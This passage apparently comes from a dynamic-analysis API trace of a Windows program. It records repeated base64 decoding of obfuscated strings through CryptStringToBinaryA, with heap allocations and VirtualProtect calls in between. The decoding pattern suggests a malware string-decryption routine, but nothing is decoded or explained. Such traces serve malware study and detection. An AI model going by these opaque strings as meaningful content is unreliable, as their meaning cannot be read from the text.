pszString="XRqfVv6JE2N1JDbzJ4nBLzctI8vMxh2bdetnRvC6I8bKarao91Kj6+XIhhmgWl2G", cchString=0x40, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.236] CryptStringToBinaryA (in: pszString="XRqfVv6JE2N1JDbzJ4nBLzctI8vMxh2bdetnRvC6I8bKarao91Kj6+XIhhmgWl2G", cchString=0x40, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.236] GetProcessHeap () returned 0x5b0000 [0181.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5c8458 [0181.236] VirtualProtect (in: lpAddress=0x5c8458, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.236] GetProcessHeap () returned 0x5b0000 [0181.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x31) returned 0x5ca110 [0181.236] CryptStringToBinaryA (in: pszString="XRqfVv6JE2NlNDXmctrFLjI2JIGN0gbGfqlxSqm/eZLFMPuvpQU=", cchString=0x34, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.236] CryptStringToBinaryA (in: pszString="XRqfVv6JE2NlNDXmctrFLjI2JIGN0gbGfqlxSqm/eZLFMPuvpQU=", cchString=0x34, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.236] GetProcessHeap () returned 0x5b0000 [0181.236] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5cc018 [0181.237] VirtualProtect (in: lpAddress=0x5cc018, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.237] GetProcessHeap () returned 0x5b0000 [0181.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x27) returned 0x5cc158 [0181.237] CryptStringToBinaryA (in: pszString="XRqfVv6JE2NlNDXmctrFLjI2JIGN0gbGfqlxSqm/eZLFMPuvpQWr5ujf3R+tERnHZ5b3q/pOEA==", cchString=0x4c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.237] CryptStringToBinaryA (in: pszString="XRqfVv6JE2NlNDXmctrFLjI2JIGN0gbGfqlxSqm/eZLFMPuvpQWr5ujf3R+tERnHZ5b3q/pOEA==", cchString=0x4c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.237] GetProcessHeap () returned 0x5b0000 [0181.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5cb758 [0181.237] VirtualProtect (in: lpAddress=0x5cb758, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.237] GetProcessHeap () returned 0x5b0000 [0181.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x38) returned 0x5cc188 [0181.237] CryptStringToBinaryA (in: pszString="XRqfVv6JE2N1JDbzJ4nNKis1I9jMwGnbfat6SKm7Np/YJeSv+Uo=", cchString=0x34, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.237] CryptStringToBinaryA (in: pszString="XRqfVv6JE2N1JDbzJ4nNKis1I9jMwGnbfat6SKm7Np/YJeSv+Uo=", cchString=0x34, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.237] GetProcessHeap () returned 0x5b0000 [0181.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5cbf00 [0181.237] VirtualProtect (in: lpAddress=0x5cbf00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.238] GetProcessHeap () returned 0x5b0000 [0181.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x27) returned 0x5cc1c8 [0181.238] CryptStringToBinaryA (in: pszString="XRqfVv6JE2N1Lyf4bs/JKHYcJNjC0GnadL41SbSwI8DS", cchString=0x2c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.238] CryptStringToBinaryA (in: pszString="XRqfVv6JE2N1Lyf4bs/JKHYcJNjC0GnadL41SbSwI8DS", cchString=0x2c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.238] GetProcessHeap () returned 0x5b0000 [0181.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5cab50 [0181.238] VirtualProtect (in: lpAddress=0x5cab50, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.238] GetProcessHeap () returned 0x5b0000 [0181.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x22) returned 0x5cc1f8 [0181.238] CryptStringToBinaryA (in: pszString="TTq3dqHH", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.239] CryptStringToBinaryA (in: pszString="TTq3dqHH", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.239] GetProcessHeap () returned 0x5b0000 [0181.239] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ca290 [0181.239] VirtualProtect (in: lpAddress=0x5ca290, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.239] GetProcessHeap () returned 0x5b0000 [0181.239] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7) returned 0x5bef00 [0181.239] CryptStringToBinaryA (in: pszString="Tie+ZKHHWA==", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.239] CryptStringToBinaryA (in: pszString="Tie+ZKHHWA==", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.239] GetProcessHeap () returned 0x5b0000 [0181.239] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ca808 [0181.239] VirtualProtect (in: lpAddress=0x5ca808, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.239] GetProcessHeap () returned 0x5b0000 [0181.239] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8) returned 0x5bee20 [0181.240] CryptStringToBinaryA (in: pszString="Tie+ZKHH", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.240] CryptStringToBinaryA (in: pszString="Tie+ZKHH", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.240] GetProcessHeap () returned 0x5b0000 [0181.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ca3a8 [0181.240] VirtualProtect (in: lpAddress=0x5ca3a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.240] GetProcessHeap () returned 0x5b0000 [0181.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7) returned 0x5bee00 [0181.240] CryptStringToBinaryA (in: pszString="VjqidqHH", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.240] CryptStringToBinaryA (in: pszString="VjqidqHH", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.240] GetProcessHeap () returned 0x5b0000 [0181.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5cb0c8 [0181.240] VirtualProtect (in: lpAddress=0x5cb0c8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.240] GetProcessHeap () returned 0x5b0000 [0181.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7) returned 0x5bee90 [0181.240] CryptStringToBinaryA (in: pszString="Sya0cKHH", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.240] CryptStringToBinaryA (in: pszString="Sya0cKHH", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.240] GetProcessHeap () returned 0x5b0000 [0181.240] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ca920 [0181.240] VirtualProtect (in: lpAddress=0x5ca920, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.241] GetProcessHeap () returned 0x5b0000 [0181.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7) returned 0x5bedb0 [0181.241] CryptStringToBinaryA (in: pszString="TjSicaHH", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.241] CryptStringToBinaryA (in: pszString="TjSicaHH", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.241] GetProcessHeap () returned 0x5b0000 [0181.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ca178 [0181.241] VirtualProtect (in: lpAddress=0x5ca178, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.241] GetProcessHeap () returned 0x5b0000 [0181.241] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7) returned 0x5bedc0 [0181.241] CryptStringToBinaryA (in: pszString="bQSdS++CVBFOLSP4", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.241] CryptStringToBinaryA (in: pszString="bQSdS++CVBFOLSP4", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.241] GetProcessHeap () returned 0x5b0000 [0181.280] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ca6f0 [0181.281] VirtualProtect (in: lpAddress=0x5ca6f0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.281] GetProcessHeap () returned 0x5b0000 [0181.281] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5ca090 [0181.281] CryptStringToBinaryA (in: pszString="bQSdS++CVBFRLyPmfNvJBS1r", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.281] CryptStringToBinaryA (in: pszString="bQSdS++CVBFRLyPmfNvJBS1r", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.281] GetProcessHeap () returned 0x5b0000 [0181.281] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5cae98 [0181.281] VirtualProtect (in: lpAddress=0x5cae98, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.281] GetProcessHeap () returned 0x5b0000 [0181.281] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x13) returned 0x5c58a8 [0181.281] CryptStringToBinaryA (in: pszString="bQSdS++CVBFSKSPm", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.282] CryptStringToBinaryA (in: pszString="bQSdS++CVBFSKSPm", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.282] GetProcessHeap () returned 0x5b0000 [0181.282] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5cac68 [0181.282] VirtualProtect (in: lpAddress=0x5cac68, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.282] GetProcessHeap () returned 0x5b0000 [0181.282] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd) returned 0x5c9fa0 [0181.282] CryptStringToBinaryA (in: pszString="bQSdS++CVBFCMirjcMfzLj4hPg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.282] CryptStringToBinaryA (in: pszString="bQSdS++CVBFCMirjcMfzLj4hPg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.282] GetProcessHeap () returned 0x5b0000 [0181.282] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ca4c0 [0181.282] VirtualProtect (in: lpAddress=0x5ca4c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.282] GetProcessHeap () returned 0x5b0000 [0181.282] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5c5ba8 [0181.282] CryptStringToBinaryA (in: pszString="bQSdS++CVBFHNCj3ccDWPw==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.282] CryptStringToBinaryA (in: pszString="bQSdS++CVBFHNCj3ccDWPw==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.282] GetProcessHeap () returned 0x5b0000 [0181.282] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5ca5d8 [0181.282] VirtualProtect (in: lpAddress=0x5ca5d8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.283] GetProcessHeap () returned 0x5b0000 [0181.283] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11) returned 0x5c5bc8 [0181.283] CryptStringToBinaryA (in: pszString="bQSdS++CVBFCMSnleA==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.283] CryptStringToBinaryA (in: pszString="bQSdS++CVBFCMSnleA==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.283] GetProcessHeap () returned 0x5b0000 [0181.283] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x104) returned 0x5cbcd0 [0181.283] VirtualProtect (in: lpAddress=0x5cbcd0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff68 | out: lpflOldProtect=0x19ff68*=0x0) returned 0 [0181.283] GetProcessHeap () returned 0x5b0000 [0181.283] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe) returned 0x5c9df0 [0181.283] CryptStringToBinaryA (in: pszString="bQSdS++CVBFCMirjcMfzOCItL8g=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.283] CryptStringToBinaryA (in: pszString="bQSdS++CVBFCMirjcMfzOCItL8g=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="bQSdS++CVBFCMirjcMfzODc2KA==", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="bQSdS++CVBFCMirjcMfzODc2KA==", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="exuSUOKXEytFAi3zZA==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="exuSUOKXEytFAi3zZA==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="QleM", cchString=0x4, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="QleM", cchString=0x4, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="TjSlag==", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="TjSlag==", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="TjSlaqY=", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="TjSlaqY=", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="UCaifdKJDjo=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="UCaifdKJDjo=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="UCaifciPEjpFMjH4", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.284] CryptStringToBinaryA (in: pszString="UCaifciPEjpFMjH4", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="Tj7AE8SgAjpoMzLzb8fNNhA8M+jB2x0=", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="Tj7AE8SgAjpoMzLzb8fNNhA8M+jB2x0=", cchString=0x20, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="Tj7AE8ShFStEDir5aQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="Tj7AE8ShFStEDir5aQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="Tj7AE8SmEjpJOCjidMrNLj4=", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="Tj7AE8SmEjpJOCjidMrNLj4=", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="Tj7AE8ijNRFlOCXkZNnY", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="Tj7AE8ijNRFlOCXkZNnY", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="TTC9Z9izRyFTNCH/c/bZKDd1as7e0RvaculwdKu/LsfOfba6+VS++OvIm3v7FhzeZ9jQlNA+EpszJoJnRg==", cchString=0x54, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="TTC9Z9izRyFTNCH/c/bZKDd1as7e0RvaculwdKu/LsfOfba6+VS++OvIm3v7FhzeZ9jQlNA+EpszJoJnRg==", cchString=0x54, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="XRqeSfKCFBIELhmzbofYIi8=", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.285] CryptStringToBinaryA (in: pszString="XRqeSfKCFBIELhmzbofYIi8=", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.286] CryptStringToBinaryA (in: 